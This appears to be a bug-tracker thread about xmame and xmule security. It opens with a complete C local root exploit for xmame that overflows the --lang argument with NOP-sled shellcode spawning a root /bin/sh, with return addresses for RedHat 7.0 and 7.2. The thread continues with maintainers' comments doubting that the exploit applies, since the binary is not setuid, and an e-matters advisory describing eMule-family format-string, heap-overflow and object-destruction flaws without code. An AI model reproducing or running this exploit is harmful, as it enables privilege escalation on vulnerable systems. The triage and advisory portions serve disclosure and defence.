xmame gain root exploit From: "Gabriel A. Maggiotti" <gmaggiot@ciudad.com.ar> To: research-list@qb0x.net, vuln-dev@securityfocus.com, bugtraq@securityfocus.com, staff@packetstormsecurity.org, gmaggiot@ciudad.com.ar Date: Saturday 16.36.41 mame_exp.c /* --------------------------------------------------------------------------- Web: http://qb0x.net Author: Gabriel A. Maggiotti Date: March 31, 2003 E-mail: gmaggiot@ciudad.com.ar --------------------------------------------------------------------------- */ #include <stdio.h> #define OFFSET 1058 #define NOP 0x90 #define NOP1 'B' #define RET_70 0xbfffee00 #define RET_72 0xbfffedf0 int main(int argc, char *argv[]) { int i=0; char buf[OFFSET]; int c, ret; unsigned char shellcode1[] = "\x33\xDB\x33\xC0\xB0\x1B\xCD\x80" // alarm(0); "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" // setuid(0); "\x31\xc0\x50\x50\xb0\xb5\xcd\x80" // setgid(0); "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; if(argc != 2) { fprintf(stderr,"usage: %s <os_type> \n",argv[0]); fprintf(stderr,"types:\n RedHat 7.0 - [1]"); fprintf(stderr,"\n RedHat 7.2 - [2]\n\n"); return 1; } c=atoi(argv[1]); switch(c) { case 1: printf("Exploiting compress for RedHat 7.0\n"); ret = RET_70 - OFFSET; break; case 2: printf("Exploiting compress for RedHat 7.2\n"); ret = RET_72 - OFFSET; break; } for(i=0;i<=OFFSET-1 ;i++) buf[i]=NOP; for(i=OFFSET-301;i<=OFFSET-1 ;i+=4) *(int *) &buf[i++] = ret; memcpy(buf+200,shellcode1,strlen(shellcode1)); execl("/usr/local/bin/xmame.x11", "/usr/local/bin/xmame.x11","--lang", buf, NULL); return 0; } /* --------------------------------------------------------------------------- research-list@qb0x.net is dedicated to interactively researching vulnerab- ilities, report potential or undeveloped holes in any kind of computer system. To subscribe to research-list@qb0x.ne t send a blank email to research-list-subscribe@qb0x.net. More help available sending an email to research-list-help@qb0x.net. Note: the list doesn't allow html, it will be stripped from messages. --------------------------------------------------------------------------- */
what version of xmame does this exploit ? i might also point out it only mentions redhat 7.x ... and how exactly does this gain root ? xmame isnt setuid (at least not on Gentoo)
e-matters GmbH www.e-matters.de -= Security Advisory =- Advisory: eMule/lmule/xmule multiple remote vulnerabilities Release Date: 2003/08/17 Last Modified: 2003/08/17 Author: Stefan Esser [s.esser@e-matters.de] Application: eMule <= 0.29c xmule <= 1.4.3, <= 1.5.6a lmule <= 1.3.1 Severity: Several vulnerabilities within emule and its unix ports allow remote compromise of p2p users. Risk: Critical Vendor Status: eMule Vendor has released a bugfixed version. (no solution for lmule, because no support anymore (no 100% solution for xmule) Reference: http://security.e-matters.de/advisories/022003.html Overview: eMule and its unix ports are the most famous filesharing clients which are based on the eDonkey2000 network. The estimated usercount reaches from 1 million to even 10 million p2p clients (according to a mldonkey statistic). With such a large userbase eMule is not only a thorn in the side of the music and movie industry but also an attractive target for script kids or worm writers. And indeed auditing the source code revealed vulnerabilities which can be abused to disturb the eMule network or to takeover other client machines. Details: The eMule source code is object oriented which makes security auditing from my point of view a lot harder because the flow of execution is not obvious and it is first needed to get a general overview of the objects and their dependencies. While auditing the source code following bugs where discovered 1) OP_SERVERMESSAGE Format String Vulnerability emule <= 0.29a xmule <= 1.4.3, <= 1.5.4 lmule <= 1.3.1 When the client receives a message from the server it passes this message to a function that expects a format string argument. This could be used by a malicious server to crash or takeover the connected client system. 2) OP_SERVERIDENT Heap Overflow emule <= 0.29a xmule <= 1.4.3, <= 1.5.4 lmule <= 1.3.1 When receiving a serverident packet from the server it is parsed in an unsafe manner that could lead to an exploitable heap overflow. Again this allows a malicious server to crash or takeover the connected client. 3) Servername Format String Vulnerabilities emule <= 0.29c xmule <= 1.4.2, <= 1.5.5 lmule <= 1.3.1 Several ways of adding a server with a name that contains format string specifiers could crash the client. Remote code execution through this bug is unlikely because only very short servernames are accepted. 4) AttachToAlreadyKnown Object Destruction Vulnerability emule <= 0.29c xmule <= 1.4.2, <= 1.5.6a lmule <= 1.3.1 When the client receives a special sequence of packets an error situation can be triggered where the currently used client object is deleted. This is similar to an ordinary double free vulnerability with the exception that here a whole object is mistakenly freed and still used. Because this hole was proven to be exploitable (remote code execution) and the same packets are completely legal for other clients (no IDS signature can be created anyway), I am not going into details how to trigger the bug. There are just too many vulnerable systems out there. Proof of Concept: e-matters is not going to release an exploit for this vulnerability to the public. The developed exploit is considered extremly dangerous because it uses a technique that allows to exploit this kind of double free bugs on Windows 2K/XP systems without version or binary dependant offsets. DCOM has shown again how devestating windows overflows are. Which is caused by not patching users on the one hand and on the other hand by an unsecure windows design that allows to exploit most vulnerabilities with very few or without system dependant offsets. Disclosure Timeline: 26. July 2003 - First contact to emule and xmule Vendors. (xmule email bounced back after some time) 29. July 2003 - emule vendor has verified and fixed the bugs. New version is in betatests. 31. July 2003 - contact with xmule vendor establised. 02. August 2003 - xmule 1.5.6a (unstable) was released by the xmule vendor. This version fixes only (3). 11. August 2003 - xmule 1.4.3 (stable) was released by the xmule vendor. I mailed the vendor the same day, that it only fixes (3) and (4) while the first two are not fixed. No reaction yet. 17. August 2003 - emule vendor released version 0.30a which fixes all security bugs. Their changelog does not underline the importance of the update and is incorrectly stating problem (4) as only a crashbug. Recommendation: It is very important that word about this vulnerability is spread fast in the eMule community, because P2P users are usually not reading security mailinglists and will therefore be very slow in upgrading to new versions of their favourite tools. If you connect to the network you can still see a huge amount of very old clients. And I hope the pressure of the xmule community can force the release of an 100% fixed version. I hope I do not need to remember the P2P users that the RIAA repeatetly asked for the right to hack into their PCs. GPG-Key: http://security.e-matters.de/gpg_key.asc pub 1024D/75E7AAD6 2002-02-26 e-matters GmbH - Securityteam Key fingerprint = 43DD 843C FAB9 832A E5AB CAEB 81F2 8110 75E7 AAD6 Copyright 2003 Stefan Esser. All rights reserved.
we've version bumped xmame twice since this was released, plus the binary isnt setuid, so this doesnt apply to us
